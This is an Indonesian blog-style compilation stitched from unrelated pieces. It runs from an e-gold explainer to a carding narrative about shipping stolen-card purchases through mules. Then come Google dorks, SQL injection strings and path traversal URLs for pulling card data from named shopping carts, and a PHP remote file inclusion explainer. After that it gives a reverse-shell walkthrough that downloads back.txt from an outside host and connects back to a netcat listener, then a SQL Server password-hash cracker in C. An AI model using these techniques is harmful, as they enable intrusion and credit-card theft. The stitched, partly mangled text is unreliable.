ato

www.creativeinovation.com/share2

E-gold™ adalah sebuah mata uang digital elektronik/ e-currency yang dikeluarkan oleh perusahaan e-gold Ltd. Mata uang ini sepenuhnya di backup oleh 100% nilai emas murni yang berlaku di pasar dunia.

“E-gold is gold itself circulated electronically. Entrepreneur JP May says that “e-gold is to money what e-mail is to letters.”

E-Gold merupakan e-currency paling populer dan terpercaya saat ini. Sudah lama digunakan (sejak 1996) sebagai sarana pembayaran oleh berbagai merchant di seluruh dunia

Pembukaan rekening E-gold™ adalah gratis tanpa ada kewajiban memberikan setoran awal maupun sejenisnya. Anda tidak harus memiliki kartu kredit untuk dapat membuka rekening e-gold™. Pembukaan rekening E-gold™ dapat dilakukan dengan sangat mudah.

Apa Satuan/Besaran yang Dipergunakan E-Gold ?

Satuan e-gold itu adalah troy ounces.
Satu troy ounces itu kira-kira 31.1 grams emas.

Nah, dari berat emas itu kemudian dihargai dengan mata uang macem-macem, USD, EUR, dll. Harganya bervariasi tergantung dengan harga emasnya saat itu terhadap kurs yang bersangkutan.
Harga emas, perak, dan platinum sehari-harinya dapat dilihat di : http://www.kitco.com/

Apa Manfaat dari E-gold ?

Manfaat dari e-gold antara lain:

* Berbelanja online contoh : http://www.goldstores.com/
* Menyimpan emas secara praktis dan efisien
* Melakukan pembayaran dari orang ke orang
* e-commerce
* Payroll
* Membayar tagihan
* Menyumbang
* Spekulasi/trading
* Investasi
* dll

Apakah E-Gold Bisa Dijadikan Uang ?

Bisa. e-gold itu bisa dijadiin duit cash baik dollar maupun rupiah.Sekarang anda bisa menjual atau membeli E-Gold dengan mudah dan simple di Indonesia. Tidak perlu lagi menunggu 2 minggu atau 1 bulan untuk mencairkan E-Gold anda.

Sebaiknya anda memiliki rekening BCA supaya proses transfer dan pencairan dana dapat dilakukan dengan cepat dan tanpa biaya transfer.

1. Cepat hanya membutuhkan waktu Max 2 x 24 Jam.

2. Tidak perlu menunggu Cek dari E-Gold.

3. Tidak perlu Collection Fee.

4. Di bayar langsung ke account bank anda.

Dimanakah Saya Bisa Mencairkan E-Gold ?

Berikut tempat untuk menjual/membeli Egold di Indonesia:

1. http://indochanger.com (Sangat disarankan : Kompetitif, minimal beli $1, cepat)
2. http://www.sentraegold.com
3. dll. (bisa juga exchange langsung dengan anggota forum)

Luar Negeri :

1. https://www.goldex.net
2. http://www.goldage.net
3. http://www.fastgold.net
4. https://www.e-forexgold.com
5. http://www.anygoldnow.com
6. dll.

Bagaimana Cara Membuka Account Gratis Di E-Gold™ ???

1. Pertama tentu saja anda harus dapat mengerti bahasa Inggris pasif dengan membaca standard perintah pengisian formulir.

2. Ketik pada kolom address web browser anda ke http://www.e-gold.com ,. Nantinya setelah anda mendapatkan nomor account dari e-gold™ andapun dapat mereferensikan kepada rekan atau keluarga anda dengan mengganti 6 digit nomor diatas dengan account anda sendiri.

3. Setelah masuk Layar akan menampilkan User Agreement juga dalam bahasa Inggris. Baca dan bila setuju klik tombol “I Agree” dibagian bawah.

4. Selanjutnya layar akan menampilkan New e-gold™ Account Creation Form yang terdiri dari 5 bagian:
- Account name
- User Name
- Point of contact
- Passphrase
- Turing number entry

Catatan:

· semua huruf tebal(bold) harus diisi.

· Perhatikan 128bit SSL dengan simbol ‘gembok kuning’ dikanan bawah layar anda karena itu menjamin security dari data yang anda isikan.

· Pilih/tentukan Account name dan user name yang anda kehendaki.

· Point of contact diisi data asli/yang sebenarnya.(karena jika anda lupa passphrase, maka passphrase ini akan dikirim melalui surat ke alamat Anda)

· Email address harus email yang masih berlaku, karena konfirmasi nomor account baru akan di kirim ke alamat tersebut.

· Telepon dan Alternate passphrase penting untuk nantinya digunakan untuk konfirmasi dalam bertransaksi PASSPHRASE, pilih minimum 6 digit angka dan huruf (campur lebih baik), kemudian dicatat karena passphrase tidak akan diberitahukan dalam email anda dan sangat RAHASIA Untuk mengakses account dan melakukan transaksi jual/beli e-gold™.

· Jangan menggunakan passphrase yang sama dengan email dan keanggotaan anda di web lain.

· Turing number hanya untuk disalin pada kolom yang tersedia dan akan selalu berubah setiap kali anda anda membuka web yang memiliki turing number.Turing number untuk keamanan pihak e-gold™ sendiri dalam mencegah pendaftaran otomatis.

5. Klik “open”. Apabila ada yang belum lengkap ikuti perintah pada layar sampai selesai.

6. Setelah selesai tunggu konfirmasi nomor account di email anda.Selanjutnya anda sudah dapat mengakses account anda dengan memasukkan nomor dan passphrase serta tentu saja turing number yang selalu berbeda.

Apakah Daftar ke E-gold Harus Menggunakan Identitas Asli ?

Sebenarnya tidak. Tapi untuk keamanan apabila terjadi claim atau untuk menghindari beberapa masalah ketika lupa password/passphrase, sebaiknya Anda menggunakan identitas Anda dengan lengkap dan benar, karena e-gold akan memberikan password baru (sementara) ke alamat Anda melalui surat, dan jangan lupa nomor telepon yg asli karena mereka akan menelepon anda (walupun account Anda ga ada duitnya, pengalaman pribadi neh )
yg terpenting passphrase jgn sampai lupa .

Menu apa saja yang tersedia di e-gold ?

Menu yang disediakan adalah sbb.:
Balance = untuk melihat saldo dana anda.
Spend = untuk transfer dana ke rekening e-Gold lain.
History = untuk melihat perincian transaksi, semacam buku rekening tabungan.Anda akan tahu mendapat transfer dari siapa, atau anda transfer kepada siapa.
Account Info = untuk merubah profile dan passphrase/password.
Pastikan selalu logout untuk keamanan account anda.

alat yang biasa di gunakan oleh Mr.A adalah ( proxy, dan data CC atau kartu kredit, anggap saja data USA )
dalam hal ini Mr. bejo dan mr.benjamin biasanya adalah temen yang didapat dari chatting, yang mempunyai ikatan saling ketergantungan lewat bisnis semata, mereka biasanya tidak saling kenal.(bisnis ini berlangsung, kareana bisanya mereka terikat keuntungan 50-50)

praktek carding terjadi biasannya dilakukan Mr.bejo dengan sangat matang dan terencana:
kira-kira akan seperti berikut ini prakteknya :

MR.bjodengan data kartu kredit orang amerika akan menjadi siempunya kartukredit itu, dia dengan fasilitas internet akan menyamar menjadi orang amerika itu dengan menggunakan Proxy ( merubah IP addressnya)
jadi ketika dia membeli membeli barang misalnya 2 biji handhone dari toko yang di australia si Mr.bejo ini telah menjadi berada di amerika, ya dengan menggunakan proxy, posisi mr.bejo seakan-akan ada di amerika. itu akan membuat simpunya toko di australia menjadi yakin bahwa dia adalah yang punya data kartu kredit asli (dan terkadang pula, yang punya toko tidak tahu menahu urusan transaksi, karena sebagian toko ada yang di handle 100% oleh merchant, jadi bila merchant sudah approve, toko mengirimkannya) dikirim kemana? jawabnya ke Mr.benjamin dan dari 2 HP tadi maka 1 HP adalah milik mr.bejo yang dikirim ke indonesia.

selain lewat toko biasanya para carder bekerja arena lelang barang (auction), yaitu menipu lewat orang perorangan, sehingga barang bukti akan semakin sedikit,
lalu kita akan mereview apa yang telah terjadi :

- uang orang amerika akan hilang (tapi mungkin akan diganti oleh asuransi bank)
- 2 HP sitoko australia akan hilang ( rugi 100%)
- Mr. B dapat 1 HP
- Mr. A dapat 1 HP

negara yang terlibat :
- Amerika
- Australia
- Indonesia
- Cina

biasanya negara seperti amerika atau australia tidak bisa berkutik untuk interpensi ke negara2 seperti cina atau jepang. makanya pengusutan selalu kandas, dan untuk uang sejumlah 10 – 20 juta melibatkan 4 negara akan sangat sulit sekali di realisasikan penyelesaiannya

kembali ke Mr. bejo setelah mereka mendapatkan HP, ada hal yang selalu menjadi alasan klasik tapi lugu,
kenapa negara ikut kasuk kusus membasmi anak bangsanya yang pahlawan pajak?
betul itu yang selalu jadi cerita …
dari 1 Hp bilanglah negara dapat 200rb, kalikan itu bila 1000 HP dari sekian carder. bukan kan itu pemasukan negara? memeng itu alasan klasik.
dan selain itu dengan sistem seperti diatas, barang sudah 100% bersih karena rantai carding pada dasarnya terputus sampai di china tadi. da indonesia justru tidak terlibat sama – sekali

Contoh – Contoh kelemahan pada online store yang sering dimanfaatkan para penjahat

contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format

http://www.xxxxx.com/cart32/

Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/c…URNS-001065.c32

contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :

http://xxxxxxx.com/vpasp/shopdisplayproduc…elect%20fldauto,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log

contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses file inclusion (yang selanjutnya kita sebut dengan istilah ‘injeksi’) bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel seperti ini:

…
include($my_ms[”root”].’/error.php’);
…

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
————-

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, etc..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos!

° SISTEM OPERASI APA YANG KEBAL?
——————————

Saya teringat permainan C&C Generals (my fave game!) saat seorang hacker keluar dari barak. Mereka mengucapkan “NO SYSTEMS IS SAFE!”. Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
————————-

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING

Banyak 3rd party untuk credit card payment gateway via internet. Tapi untuk di Indonesia masih sedikit, dan kebanyakan terus tidak bisa berjalan. Contoh www.commerce.net.id atau www.cipas.com (Cipas sebetulnya perusahaan Malaysia kalau tidak salah, tapi memiliki kantor di Indonesia). Dulu BII juga menyediakan jasa ini. Ada beberapa yang lain, tapi saya sendiri kurang tahu.

Jadi pemilihan 3rd party terpaksa harus anda lakukan dengan pihak yang ada di luar negeri. Sebaiknya mungkin anda cari yang sudah bekerja sama atau dipercaya oleh Verisign misalnya. Agak repot emang urusan yang satu ini.

Kesulitan lain yang mungkin terjadi, anda sudah harus mempunyai aplikasi online (shopping cart) yang kemudian akan dihubungkan dengan sistem paymetn gateway mereka. Jadi anda harus bekerja sama dengan pembuat web anda, dan memberikan object yang diberikan oleh 3rd party ini. (Oh ya, merchant tidak diperbolehkan menyimpan data credit card lho). Sebaiknya anda juga menggunakan jasa konsultan pembuatan web yang baik. Kalau menggunakan pembuat web yang ‘asal’, kemungkinan anda malah enggak punya shopping cart yang memadai.

Begitu website dengan shopping cart anda selesai, kemudian menempelkan object code yang diberikan si penyedia jasa pembayaran, anda sudah bisa jualan ke se antero dunia. Selesai?

Resiko berjualan dengan pembayaran Credit Card

Ternyata tidak semudah yang dibayangkan. Tingkat fraud credit card masih tinggi. Anda harus bersiap-siap menanggung kerugian apabila si pembeli menggunakan credit card secara illegal. Penyedia jasa pembayaran tidak akan membayar anda jika hal ini terjadi. Sederhananya, andalah yang menanggung akibatnya jika terjadi apa-apa dengan kartu kredit ini. Adil? Tapi inilah syarat yang diberikan oleh penyedia jasa pembayaran.

Inilah bagian terberat menjadi merchant online. Kalau anda hanya menjual jasa layanan seperti hosting, mungkin anda hanya tinggal memutuskan jasa layanan anda. Tapi kalau berupa produk, dimana anda harus bermodal dulu?

Ada beberapa tips untuk menghindari fraud credit card bagi anda yang sudah menjadi merchant online:

• Beberapa negara di dunia sudah di ‘black list’ karena sering terjadi fraud, seperti: Africa, Rumania, Nigeria, Malaysia, Slovenia dan Indonesia!. Artinya kalau anda pemegang kartu kredit Indonesia, jangan harap kartu anda bisa untuk membeli barang online. Jadi kalau anda sebagai merchant ragu … jangan dikirim.
• Pembeli beralamatkan di Thailand, misalnya, tapi menggunakan kartu kredit USA, ini juga harus dicurigai.
• Walaupun sudah di blacklist atau enggak bisa pesan online, Carder (istilah untuk pengguna kartu kredit illegal) Indonesia sering mengakali dengan cara lain. Mereka bisa menelepon anda, kemudian memesan via telepon/fax, dan memberikan data kartu kredit mereka. Sebaiknya ini juga jangan di percaya. Bahkan jika mereka bisa membuktikan dapat memberikan laporan pembayaran kartu kredit selama 3 bulan terakhir. Ada baiknya konfirmasi ke bank yang memberikan kartu kredit, dan minta bank untuk memberitahu pelanggannya bahwa ada transaksi ke anda. Jika pihak Bank kemudian memberitahukan bahwa kartu kredit tersebut tidak digunakan, maka batalkan saja.
• Dan masih banyak cara-cara jahat lainnya yang masih belum saya tahu. Jika anda tahu, mohon beritahu saya juga.

VISA dan Mastercard sedang mengupayakan agar transaksi online di internet harus menggunakan nomor pin yang dapat diubah-ubah oleh pemiliknya. Mudah-mudahan langkah ini dapat menjadikan eCommerce di Internet lebih baik dan menghilangkan citra buruk di masa lampau. Sayangnya, si pemilik harus mau berepot-repot ria mendaftarkan diri ke bank yang mengeluarkan kartu. Ini mengurangi kesempatan orang untuk berbelanja online.

Terakhir saran saya, kalau bisa, cari penyedia jasa Payment Gateway yang sudah menggunakan ini. Mudah-mudahan anda sebagai merchant akan terlindungi.

taru script itu di server target gak di mana aja terserah yang penting drwxrwxrwx hehecara gunainnya

perl back.txt ipkamu portyang dibuka >> pasangan serasinya nc
cth:
di pc kamu jalankan dengan syarat pc kamu memilikin ip public
sh-2.05b$ ./nc -l -v -p 2500 >> klo kamu pake *nix
./nc -l -v -p 2500
listening on [any] 2500 …

D:\Hacking\backdoor>nc.exe -l -v -p 2500 >> klo kamu pake windows
listening on [any] 2500 …

nc for windows or *nix bisa di download di solpotcrew.org/xpl/ >>> disini cari ya

trus kita jalankan back.txt di mesin target lewat php sheell aja

perintahnya
perl back.txt 202.xxx.xxx.xxx 2500
knapa 2500 >> karena tadi kita membuka port 2500 pake nc ini terserah kamu

contoh nyata:
aku jalankan nc di server yang udah di pasang bind dan gw bisa make server itu or pc kamu sendiri
sh-2.05b$ ./nc -l -v -p 2500
./nc -l -v -p 2500
listening on [any] 2500 …
cukup sampe sini yang kita lakukan di pc kita

aku pake konect back dan jalankan perintah sbb:(perintah2 dibawah ini saya jalankan di mesin target lewat php shell)

lwp-download http://home-edition2001.org/xpl/back.txt >> mengambil file script back.txt
Saving to ‘back.txt’… 1.18 KB received
cara penggunaannya:
perl back.txt 213.203.223.43 2500 >> 213.203.223.43 ip kita
tekan enter aja

liat di nc kamu ini perubahannya:
sh-2.05b$ ./nc -l -v -p 2500
./nc -l -v -p 2500
listening on [any] 2500 …
connect to [213.203.223.43] from 2.67.5746.static.theplanet.com [70.87.103.2] 4473
SoLpOt NuMpAnG LeWaT
We ArE JuSt A LiTtLe ChiLd

FreeBSD server3.nusantaraonline.info 4.11-RELEASE FreeBSD 4.11-RELEASE #1: Fri Dec 16 07:45:43 WIT 2005 root@server3.nusantaraonline.info:/usr/src/sys/compile/nusantaraonline i386
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

kamu sekarang berhasil melakukan conect back selamat ya heheh

————————————————————————–
select password from master.dbo.sysxlogins where name=’sa’
————————————————————————–

. Anda akan mendapatkan hash ‘sa’ sebagai berikut :
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B

ingat : ini adalah hash utk ‘sa’ di PC saya.

. Mari kita gunakan ‘clear hashsing’

0×0100 —–> constant header
8D504D65 —–> to calls to rand()
431D6F8AA7AED333590D7DB1863CBFC98186BFAE —–> case sensitif SHA HASH
06EB6B327EFA5449E6F649BA954AFF4057056D9B —–> upper case SHA HASH

. Gunakan pemecah HASH berikut ini :

—————————————————————
SQLCrackCl

This will perform a dictionary attack against the
upper-cased hash for a password. Once this
has been discovered try all case variant to work
out the case sensitive password.

This code was written by David Litchfield to
demonstrate how Microsoft SQL Server 2000
passwords can be attacked. This can be
optimized considerably by not using the CryptoAPI.

(Compile with VC++ and link with advapi32.lib
Ensure the Platform SDK has been installed, too!)

* Script ini telah di uji oleh : lirva32
dan utk aplikasi pembobolan MS. SQL Server Anda juga
bisa mempergunakan aplikasi jadi : SQLBF, silahkan
googling dan donload.

—————————————————————-

#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = “\nLength Error!\n”;
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;

if(argc !=3)
{
printf(“\n\n*** SQLCrack *** \n\n”);
printf(“C:\\>%s hash passwd-file\n\n”,argv[0]);
printf(“David Litchfield (david@ngssoftware.com)\n”);
printf(“24th June 2002\n”);
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf(“\nThere was an error opening the password file %s\n”,argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf(“\n\n%d”,wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,”r”);
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]=”";
char pheader[8]=”";
char pkey[12]=”";
char pnorm[44]=”";
char pucase[44]=”";
char pucfirst[8]=”";
char wttf[44]=”";
char uwttf[100]=”";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;

DWORD hl=100;
unsigned char szhash[100]=”";
int len=0;
if(strlen(hash) !=94)
{
return printf(“\nThe password hash is too short!\n”);
}
if(hash[0]==0×30 && (hash[1]== ‘x’ || hash[1] == ‘X’))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf(“\nHeader\t\t: %s”,pheader);
if(strlen(pheader)!=4)
return printf(“%s”,lerr);
hash = hash + 4;
strncpy(pkey,hash,8 ) ;
printf(“\nRand key\t: %s”,pkey);
if(strlen(pkey)! = 8 )
return printf(“%s”,lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf(“\nNormal\t\t: %s”,pnorm);
if(strlen(pnorm)!=40)
return printf(“%s”,lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf(“\nUpper Case\t: %s”,pucase);
if(strlen(pucase)!=40)
return printf(“%s”,lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,”%x”,&cmp);
}
else
{
return printf(“The password hash has an invalid format!\n”);
}
printf(“\n\n Trying…\n”);
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,

NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf(“FAILLLLLLL!!!”);
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf(“\nEnd of password file. Didn’t find the password.\n”);
wd++;
len = strlen(wttf);
wttf[len-1]=0×00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0×00;
count++;
cnt++;
}
len –;
wp = &uwttf;
sscanf(pkey,”%x”,&key);
cnt = cnt – 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;

x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf(“Error %x during CryptCreatHash!\n”, GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf(“Error %x during CryptHashData!\n”, GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,”%x”,&cmp);
if(szhash[cnt]==cmp)
cnt ++;
else
{
break;
}
}
if(cnt == 20)
{

// We’ve found the password
printf(“\nA MATCH!!! Password is %s\n”,wttf);
return 0;
}
}
count = 0;
cnt=0;
}
return 0;
}

.::Rapidleecher & Rapidkill::.

-http://worldforfree.net/rapid/index.php

-http://imeltfaces.com/ownage/index.php

-http://www.holul.com/sharekiller/

-http://lapa20.com/rapidleech

-http://www.osrty.com/dw/

-http://vitinhclub.net/diendan/

-http://www.masteryogashram.com/sai/leela/index.php

-http://www.urban-fix.com/index.php

-http://www.d7mone.com/rap/index.php

-http://www.nuocngakiniem.com/Rapidshare/index.php

-http://www.bvtu.net/dat/

-http://semoga-awet.org/rapid

